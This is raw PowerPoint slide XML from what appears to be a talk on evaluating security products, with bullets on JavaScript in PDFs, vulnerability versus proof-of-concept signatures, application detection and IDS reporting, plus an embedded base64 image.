            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="328371" y="1017588"/>
            <a:ext cx="8489904" cy="4337872"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Legit JS compression</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>JavaScript is allowed in PDF’s</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>All the problems of a Webpage but now in a compound document</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>PDF can contain PNG (obviously) but isn’t a PNG at all but an XFA form</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>which guess what, includes JavaScript</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="968627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Signatures</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="328371" y="1017588"/>
            <a:ext cx="8489904" cy="5087547"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Vulnerability Signature vs. Proof of Concept (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>PoC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>) Signatures</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Vulnerability signatures were far easier and more useful during the server era</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Vulnerability signatures are more often than not, impossible for content level vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Heuristic, behavioral, generic signatures are more effective</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Size Doesn’t Matter</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>It is not how many signatures you have, its how well they work and when they trigger effectively</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3620587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Detection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="328371" y="1017588"/>
            <a:ext cx="8489904" cy="5324218"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>What is Application Detection?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Detection of applications with more signatures</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Limitation of applications that run on the endpoint enforced by the gateway?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Whitelisting of applications allow vulnerabilities?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Are “NG” technologies really just blocking non-threatening Farmville that is not a threat?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>What threats are they blocking?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Is this a security issue or an HR issue?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Is it worth it?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="52776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Policy/Management/Reporting</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="328371" y="1017588"/>
            <a:ext cx="3758284" cy="5022604"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>If an IDS detects an event but doesn’t tell anyone, does it make a sound?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>If I can’t tell my IDS what I want to hear, does it have value to me?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="AutoShape 2" descr="data:image/jpeg;base64,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Opa2ioHLZmY9piVI8LmeTM8piUiImUIiICIiAl1LElUqUwBaoUJPMZCSLfalMQPSo9LAU+HUpCouVE7bIeo9RwSR41D7Sf8A+pRKqhwylULMo41UWLWza317InlRNdquvVfpSiyqrYZCEBVf11UWUsWtvrqxkMT0yz57U6dNqi8NnUMahp2Ay5mY8gATa5nmxHam1PjHJksLZs97DNcgDtb202lc7Eyj18P0+6EPw6ZewVnsc75VslyTYWOUmwF8ovM3RnSbUAyhQ+YhhcnqsFdb+zmYYmu1Xa00cc60alHdKhVvJl5jzsPac6PxXBqJUADFCSAds1jY+hsfSZ4k2o39F9KNQDgKHzFW1J0dQwvp4OwlNDHOlKrRGq1SjHwZSDcedgPQTNEbV1uo9JstShUyg8BVQC5AIXNue/rGSHSzLlFNEp01zDh2LKwcZW4hY3e4038rTz4l7U16lPpjcNSTh8NqQpqzIozMrM2a5YklBreVVOlGYv1VVWpcBVAIVEzBur3m43O9zMER2ptJfUxRK0lsLUc1u85mzG/rKIkR6tfpdKtuLQVyGqMDxXQfrHZyLL4t3yo9KnjrWCgBQEFO5y8MJky38r+88+Je1Xa3YrpR6gqKQMtTh6b5WpqFDKeRIFj4GUYHEmlUSoACUN7HYyiJNu6mtPR2MNFiwAa6FLHTQ21+Uux+OpVc5FAI7sWL8V2sSbmynTXXlzmCI25hqdasWy3AGVQgsANBzNtzrvIREgREQEREBERAREQEREBERAREQEREBERAREQEREBERAREQEREBERAREQEREBERAREQEREBERAREQEREBERAREQEREBERAREQEREBERAREQEREBERAREQEREBERA//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1LElUqUwBaoUJPMZCSLfalMQPSo9LAU+HUpCouVE7bIeo9RwSR41D7Sf8A+pRKqhwylULMo41UWLWza317InlRNdquvVfpSiyqrYZCEBVf11UWUsWtvrqxkMT0yz57U6dNqi8NnUMahp2Ay5mY8gATa5nmxHam1PjHJksLZs97DNcgDtb202lc7Eyj18P0+6EPw6ZewVnsc75VslyTYWOUmwF8ovM3RnSbUAyhQ+YhhcnqsFdb+zmYYmu1Xa00cc60alHdKhVvJl5jzsPac6PxXBqJUADFCSAds1jY+hsfSZ4k2o39F9KNQDgKHzFW1J0dQwvp4OwlNDHOlKrRGq1SjHwZSDcedgPQTNEbV1uo9JstShUyg8BVQC5AIXNue/rGSHSzLlFNEp01zDh2LKwcZW4hY3e4038rTz4l7U16lPpjcNSTh8NqQpqzIozMrM2a5YklBreVVOlGYv1VVWpcBVAIVEzBur3m43O9zMER2ptJfUxRK0lsLUc1u85mzG/rKIkR6tfpdKtuLQVyGqMDxXQfrHZyLL4t3yo9KnjrWCgBQEFO5y8MJky38r+88+Je1Xa3YrpR6gqKQMtTh6b5WpqFDKeRIFj4GUYHEmlUSoACUN7HYyiJNu6mtPR2MNFiwAa6FLHTQ21+Uux+OpVc5FAI7sWL8V2sSbmynTXXlzmCI25hqdasWy3AGVQgsANBzNtzrvIREgREQEREBERAREQEREBERAREQEREBERAREQEREBERAREQEREBERAREQEREBERAREQEREBERAREQEREBERAREQEREBERAREQEREBERAREQEREBERAREQEREBERA//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90" y="1726604"/>
            <a:ext cx="4606585" cy="32953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72485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You Judge Security Products?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="328371" y="1017588"/>
